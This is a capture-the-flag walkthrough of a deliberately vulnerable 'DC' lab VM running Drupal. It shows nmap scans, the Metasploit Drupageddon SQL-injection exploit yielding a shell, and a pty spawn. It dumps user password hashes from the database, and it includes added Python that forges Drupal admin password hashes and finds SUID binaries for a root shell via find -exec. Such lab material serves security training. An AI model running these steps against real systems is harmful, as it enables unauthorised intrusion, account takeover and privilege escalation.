Environment
Kali 2018 (attacker) and the DC target machine, both running as VMs
Scan host
1. Check the MAC address of the DC VM in its network adapter settings, so the host found by the scan can be matched to it.
2. Boot the DC VM, then run a host-discovery scan of the VM subnet from Kali:
nmap -sn 192.168.80.0/24
Among the hosts found, 192.168.80.138 is Kali itself and 192.168.80.139 (matched by its MAC address) is the DC target. Opening it in a browser shows the DC landing page.
The site is recognisably Drupal but exposes no other information, so the next step is a full port scan.
port scan
nmap -p- -A -v 192.168.80.139
The scan results are as follows:
Four open ports were found. On port 80 the default NSE scripts run by -A reported a robots.txt, which can be fetched directly from the site root.
Its content:
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
This is the stock robots.txt that Drupal ships with (the standard Drupal directories, install/update scripts and admin paths), so beyond confirming Drupal it yields nothing new; proceed to scanning the web directories.
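A robots.txt like the one above is mainly useful as a list of paths the site owner did not want indexed. The following is an added example (not code from the original page) that parses a robots.txt into per-agent Disallow lists, collapses Drupal's duplicated "?q=" forms into one probe list, and applies a fingerprint heuristic of my own: if most of the stock Drupal Disallow entries are present together, the file is taken as Drupal's default. The sample text is a shortened copy of the file fetched above.

```python
from typing import Dict, List

# Constructed sample: a shortened copy of the robots.txt fetched from the target.
SAMPLE_ROBOTS = """\
# robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /install.php
Disallow: /update.php
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /user/login/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=user/login/
"""

# Entries that Drupal's stock robots.txt disallows together (my own marker set).
DRUPAL_MARKERS = {"/includes/", "/misc/", "/modules/", "/profiles/",
                  "/themes/", "/xmlrpc.php", "/update.php", "/CHANGELOG.txt"}


def parse_robots(text: str) -> Dict[str, List[str]]:
    """Map each User-agent to the Disallow/Allow paths of its record.
    Comments (#...) and unknown fields such as Crawl-delay are skipped;
    consecutive User-agent lines share one record, as the robots format allows."""
    records: Dict[str, List[str]] = {}
    agents: List[str] = []
    last_was_agent = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not last_was_agent:
                agents = []          # a new record starts
            agents.append(value)
            records.setdefault(value, [])
            last_was_agent = True
            continue
        last_was_agent = False
        if field in ("disallow", "allow") and value:
            for agent in agents:
                records[agent].append(value)
    return records


def probe_paths(disallowed: List[str]) -> List[str]:
    """Distinct paths worth requesting: Drupal's '/?q=foo/' (no clean URLs)
    is the same resource as '/foo/', so both forms collapse to one entry."""
    seen, out = set(), []
    for path in disallowed:
        if path.startswith("/?q="):
            path = "/" + path[len("/?q="):]
        if path not in seen:
            seen.add(path)
            out.append(path)
    return out


def looks_like_drupal(paths: List[str]) -> bool:
    """Heuristic: 6 of the 8 stock Drupal Disallow entries present together."""
    return len(DRUPAL_MARKERS.intersection(paths)) >= 6


if __name__ == "__main__":
    records = parse_robots(SAMPLE_ROBOTS)
    paths = probe_paths(records["*"])
    print("drupal:", looks_like_drupal(paths))
    for p in paths:
        print(p)
```

The probe list is what you would feed to a directory scanner in place of a generic wordlist; unlike a wordlist it is guaranteed to name paths that exist (or existed) on this application.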
Use the directory scanner module in msfconsole to brute-force web directories:
root@kali:~# msfconsole
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.80.139
msf auxiliary(scanner/http/dir_scanner) > set THREADS 20
msf auxiliary(scanner/http/dir_scanner) > show options
msf auxiliary(scanner/http/dir_scanner) > run
The scan results are as follows; most hits are 403 Forbidden and the rest are of no practical use.
Search msfconsole for modules that target Drupal:
msf > search drupal
Results:
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Drupal OpenID External Entity Injection
auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Drupal Views Module Users Enumeration
exploit/multi/http/drupal_drupageddon 2014-10-15 excellent Drupal HTTP Parameter Key/Value SQL Injection
exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Drupal CODER Module Remote Command Execution
exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Drupal Drupalgeddon 2 Forms API Property Injection
exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Drupal RESTWS Module Remote PHP Code Execution
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
Use the third module, drupal_drupageddon (CVE-2014-3704, the SQL injection in Drupal 7's database abstraction layer), and run the following commands in order:
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 192.168.80.139
RHOST => 192.168.80.139
msf exploit(multi/http/drupal_drupageddon) > run
A session opening (the module's default payload is a PHP Meterpreter) means the injection succeeded.
Running ls in the session shows flag1.txt in the web root; reading it gives a hint that points at the Drupal configuration file.
Drupal's configuration file is sites/default/settings.php under the web root; cat it to get the database name, user and password used below.
Database operations
Running the mysql client directly from the Meterpreter prompt fails. Switch to a system shell with the shell command and run it again; the client connects, but without a TTY nothing is echoed back:
mysql -udbuser -p
Spawn a pseudo-terminal first so the shell, and mysql inside it, echo properly:
python -c 'import pty;pty.spawn("/bin/sh")'
Get the user records (after selecting the Drupal database named in settings.php):
mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | [email protected] | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | [email protected] | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | [email protected] | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | [email protected] | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)
The pass column holds Drupal 7 hashes ($S$ prefix, salted and iterated SHA-512), so a new password cannot simply be written in as plaintext. From the shell, generate a hash for a password of your choosing (Drupal 7 ships scripts/password-hash.sh in the web root for exactly this), then return to the mysql client and update the pass column of the admin row with it.
Log in as admin in the browser and the flag3 information is there in the site content.
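To show what that hash actually is, and to be able to generate one without depending on the target's PHP, here is an added example (not code from the original page or from Drupal) that ports Drupal 7's password hashing from includes/password.inc to Python: the phpass-style base64 alphabet, the "$S$" + count + 8-char salt setting string, 2^count rounds of SHA-512, and truncation of the stored hash to 55 characters. The salt, the password "newpass" and the user name "admin" are assumptions for the demonstration; the admin hash used in the final check is the one from the users table above.

```python
import hashlib
import hmac
import math
import os
from typing import Optional

# Constants as defined in Drupal 7's includes/password.inc
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55          # DRUPAL_HASH_LENGTH: stored hashes are cut to this many chars
HASH_COUNT_LOG2 = 15      # DRUPAL_HASH_COUNT: 2**15 rounds; 'D' in "$S$D..." encodes 15
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30


def password_base64_encode(data: bytes) -> str:
    """phpass-style base64 with Drupal's alphabet and no padding (_password_base64_encode)."""
    out, i, count = [], 0, len(data)
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def password_crypt(password: str, setting: str, algo: str = "sha512") -> Optional[str]:
    """Port of _password_crypt(). `setting` is the first 12 chars of a hash:
    "$S$" + iteration-count char + 8-char salt. Returns None on a bad setting."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return None
    salt = setting[4:12].encode("utf-8")
    pw = password.encode("utf-8")
    digest = hashlib.new(algo, salt + pw).digest()
    for _ in range(1 << count_log2):        # the slow part: 2**count_log2 rounds
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + password_base64_encode(digest)
    if len(output) != 12 + math.ceil(8 * len(digest) / 6):
        return None
    return output[:HASH_LENGTH]


def user_hash_password(password: str, count_log2: int = HASH_COUNT_LOG2,
                       salt: Optional[bytes] = None) -> str:
    """user_hash_password(): fresh 6-byte random salt unless one is supplied (for tests)."""
    salt = os.urandom(6) if salt is None else salt
    setting = "$S$" + ITOA64[count_log2] + password_base64_encode(salt)
    result = password_crypt(password, setting)
    assert result is not None
    return result


def user_check_password(password: str, stored_hash: str) -> bool:
    """user_check_password() for $S$ (sha512) and phpass $H$/$P$ (md5) hashes.
    The legacy "U$" md5-upgraded form is not handled here."""
    algo = {"$S$": "sha512", "$H$": "md5", "$P$": "md5"}.get(stored_hash[:3])
    if algo is None:
        return False
    computed = password_crypt(password, stored_hash, algo)
    # Drupal compares with ==; a constant-time compare costs nothing extra.
    return computed is not None and hmac.compare_digest(computed, stored_hash)


def admin_reset_sql(new_password: str, name: str = "admin") -> str:
    """The UPDATE to paste into the mysql client. The hash alphabet contains no
    quote characters, so no escaping is needed for the hash itself."""
    return f"UPDATE users SET pass='{user_hash_password(new_password)}' WHERE name='{name}';"


if __name__ == "__main__":
    print(admin_reset_sql("newpass"))   # assumed replacement password
```

Note the truncation: the full encoded SHA-512 output would be 98 characters, but Drupal stores and compares only the first 55, which is why the hashes in the users table all have that length.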
Use the find command to escalate privileges
flag3 hints that special permissions on a binary will help find the passwd. First read /etc/passwd; it lists a flag4 user and the location of its home directory.
Go to that directory and read the flag4 file. It indicates that root privileges are needed to reach the last flag. The special permission is the SUID bit on find, so from the shell run find with its -exec action to spawn /bin/sh; the spawned shell runs as root, and from it the final flag can be found.
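Finding that binary is the generic step of this escalation, so here is an added example (my own code, not from the page) that does what find / -perm -4000 -type f 2>/dev/null does, but in Python: walk the filesystem, report regular files with the setuid bit, and flag the ones whose normal features execute other programs (find via -exec, vim via :!, and so on). The SHELL_CAPABLE list is my own short selection, and the sample directory in the usage call is an assumption.

```python
import os
import stat
from typing import Dict, List, Tuple

# Binaries whose ordinary features run other programs, so a setuid-root copy
# hands out a root shell (find -exec, vim :!, awk system(), ...). My own list.
SHELL_CAPABLE = {"find", "vim", "vi", "nmap", "awk", "gawk", "perl", "python",
                 "python2", "python3", "bash", "sh", "less", "more", "env", "nano"}


def find_suid(root: str = "/") -> List[Tuple[str, int]]:
    """Return (path, owner uid) for every regular file under `root` with the
    setuid bit set. Symlinks are not followed and unreadable directories are
    skipped, matching `find / -perm -4000 -type f 2>/dev/null`."""
    hits: List[Tuple[str, int]] = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


def classify(hits: List[Tuple[str, int]]) -> List[Dict[str, object]]:
    """Mark each SUID file as owned by root or not and as shell-capable or not.
    Only a root-owned, shell-capable file gives the find-style escalation."""
    report = []
    for path, uid in hits:
        report.append({
            "path": path,
            "owner_root": uid == 0,
            "abusable": os.path.basename(path) in SHELL_CAPABLE,
        })
    return report


def escalation_candidates(root: str = "/") -> List[str]:
    """Paths that are both root-owned and shell-capable, i.e. the ones to try
    the page's `find . -exec /bin/sh \\;` trick (or its equivalent) on."""
    return [r["path"] for r in classify(find_suid(root))
            if r["owner_root"] and r["abusable"]]


if __name__ == "__main__":
    for entry in classify(find_suid("/usr/bin")):   # assumed starting directory
        print(entry)
    print("candidates:", escalation_candidates("/usr/bin"))
```

On the DC target the candidate list is where /usr/bin/find shows up; a setuid find then runs the -exec'd shell with root's effective uid, which is exactly the step the walkthrough uses.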
View the final flag, and the walkthrough is done:
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7